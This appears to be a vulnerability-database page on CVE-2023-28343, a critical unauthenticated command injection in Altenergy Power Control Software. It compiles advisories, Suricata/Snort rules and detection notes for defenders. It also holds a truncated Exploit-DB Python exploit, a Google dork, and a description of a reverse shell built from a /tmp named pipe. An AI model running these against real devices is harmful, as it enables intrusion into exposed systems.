CVE-2023-28343
published 2023-03-14CVE-2023-28343: OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter…
PriorityP191critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
ITWEXPLOITVulnCheck KEVInitial access
Exploited in the wild
EPSS
85.33%
99.7th percentile
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apsystems | energy_communication_unit_firmware | — | — |
Detection & IOCsextracted from sources · hover to see the quote
snort
alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/management/set_timezone"; fast_pattern; endswith; http.request_body; content:"timezone="; pcre:"/^[^&]{0,50}(?:%60|%24|%3B)/PRi"; reference:url,github.com/superzerosec/CVE-2023-28343; reference:cve,2023-28343; classtype:attempted-admin; sid:2044825; rev:1; metadata:affected_product HTTP_Server, attack_target Server, created_at 2023_03_28, cve CVE_2022_25237, deployment Perimeter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2023_03_29, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)- →Exploit sends HTTP POST to /index.php/management/set_timezone with shell metacharacters (backtick, $, ;) in the 'timezone' body parameter. Look for URL-encoded variants: %60 (backtick), %24 ($), %3B (;) in the request body.
- →Exploit sets specific HTTP headers: X-Requested-With: XMLHttpRequest and Content-Type: application/x-www-form-urlencoded; charset=UTF-8. Referer is set to /index.php/management/datetime. Combination of these with a POST to set_timezone is a strong signal.
- →Successful exploitation returns HTTP 200 with body containing 'Time Zone updated successfully' and Content-Type text/html. Monitor for this response following suspicious timezone POST requests.
- →Shodan/FOFA exposure: devices with title 'Altenergy Power Control Software' are the target surface. Use these queries to identify exposed assets.
- →The exploit creates a named pipe at /tmp/pipe and spawns /bin/sh — monitor for mknod calls creating FIFOs in /tmp and subsequent shell execution from web server processes.
- →DNS interaction (OOB) via nslookup is used for blind detection of the injection. Monitor outbound DNS queries originating from the web server process as an indicator of successful exploitation.
- ·APSystems has not responded to CISA mitigation requests; no vendor patch is confirmed available. Detection and network isolation are the primary defensive options. ↗
- ·The vulnerability requires no authentication (PR:N, UI:N), meaning any network-reachable instance is exploitable without credentials.
CVSS provenance
nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vulncheck9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-77pg-3832-hjf8: OS command injection affects Altenergy Power Control Software C1
ghsa_unreviewed·2023-03-14
CVE-2023-28343 [CRITICAL] CWE-78 GHSA-77pg-3832-hjf8: OS command injection affects Altenergy Power Control Software C1
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
VulnCheck
apsystems energy_communication_unit_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
vulncheck·2023·CVSS 9.8
CVE-2023-28343 [CRITICAL] apsystems energy_communication_unit_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
apsystems energy_communication_unit_firmware Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
OS command injection affects Altenergy Power Control Software C1.2.5 via shell metacharacters in the index.php/management/set_timezone timezone parameter, because of set_timezone in models/management_model.php.
Affected: apsystems energy_communication_unit_firmware
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=2023-12-04&host_type=src&vulnerability=cve-2023-28343; https://dashboard.shadowserver.org/statistics/honeypot/vulnerability/map/?day=20
CISA ICS
APSystems Altenergy Power Control
cisa_ics·2023-08-01·CVSS 9.8
[CRITICAL] APSystems Altenergy Power Control
ICS Advisory
##
APSystems Altenergy Power Control
Release DateAugust 01, 2023
Alert CodeICSA-23-213-01
## 1. EXECUTIVE SUMMARY
- CVSS v3 9.8
- ATTENTION: Exploitable remotely / low attack complexity / public exploits available
- Vendor: APSystems
- Equipment: Altenergy Power Control
- Vulnerability: OS Command Injection
## 2. RISK EVALUATION
Successful exploitation of this vulnerability may allow remote code execution.
## 3. TECHNICAL DETAILS
## 3.1 AFFECTED PRODUCTS
The following versions of Altenergy Power Control software are affected:
- Altenergy Power Control Software: C1.2.5
## 3.2 VULNERABILITY OVERVIEW
3.2.1 IMPROPER NEUTRALIZATION OF SPECIAL ELEMENTS USED IN AN OS COMMAND ('OS COMMAND INJECTION') CWE-78
OS command injection affe
Suricata
ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)
suricata·2023-03-28·CVSS 9.8
CVE-2023-28343 [CRITICAL] ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)
ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)
Rule: alert http any any -> [$HTTP_SERVERS,$HOME_NET] any (msg:"ET WEB_SPECIFIC_APPS Altenergy Power Control Software Command Injection Attempt (CVE-2022-25237)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/management/set_timezone"; fast_pattern; endswith; http.request_body; content:"timezone="; pcre:"/^[^&]{0,50}(?:%60|%24|%3B)/PRi"; reference:url,github.com/superzerosec/CVE-2023-28343; reference:cve,2023-28343; classtype:attempted-admin; sid:2044825; rev:1; metadata:affected_product HTTP_Server, attack_target Server, created_at 2023_03_28, cve CVE_2022_25237, deployment Perimeter, confidence High, signature_severity Major, tag Description_Generated_By_Proofpo
Exploit-DB
Altenergy Power Control Software C1.2.5 - OS command injection
exploitdb·2023-04-08·CVSS 9.8
CVE-2023-28343 [CRITICAL] Altenergy Power Control Software C1.2.5 - OS command injection
Altenergy Power Control Software C1.2.5 - OS command injection
---
# Exploit Title: Altenergy Power Control Software C1.2.5 - OS command injection
# Google Dork: intitle:"Altenergy Power Control Software"
# Date: 15/3/2023
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://apsystems.com/
# Version: C1.2.5
# Tested on: Windows 10
# CVE : CVE-2023-28343
import requests
import argparse
def exploit(target,attacker,port):
url = f'{target}/index.php/management/set_timezone'
headers = {
'Accept': 'application/json, text/javascript, */*; q=0.01',
'X-Requested-With': 'XMLHttpRequest',
'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36',
'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
'Or
Nuclei
Altenergy Power Control Software C1.2.5 - Remote Command Injection
nuclei·CVSS 9.8
CVE-2023-28343 [CRITICAL] Altenergy Power Control Software C1.2.5 - Remote Command Injection
Altenergy Power Control Software C1.2.5 - Remote Command Injection
Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management_model.php. An attacker can potentially obtain sensitive information, modify data, and/or execute unauthorized operations without entering necessary credentials.
Template:
id: CVE-2023-28343
info:
name: Altenergy Power Control Software C1.2.5 - Remote Command Injection
author: pikpikcu
severity: critical
description: |
Altenergy Power Control Software C1.2.5 is susceptible to remote command injection via shell metacharacters in the index.php/management/set_timezone parameter, because of set_timezone in models/management
No writeups or analysis indexed.
http://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.htmlhttps://apsystems.comhttps://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.mdhttp://packetstormsecurity.com/files/171775/Altenergy-Power-Control-Software-C1.2.5-Command-Injection.htmlhttps://apsystems.comhttps://github.com/ahmedalroky/Disclosures/blob/main/apesystems/os_command_injection.md
2023-03-14
Published
Exploited in the wild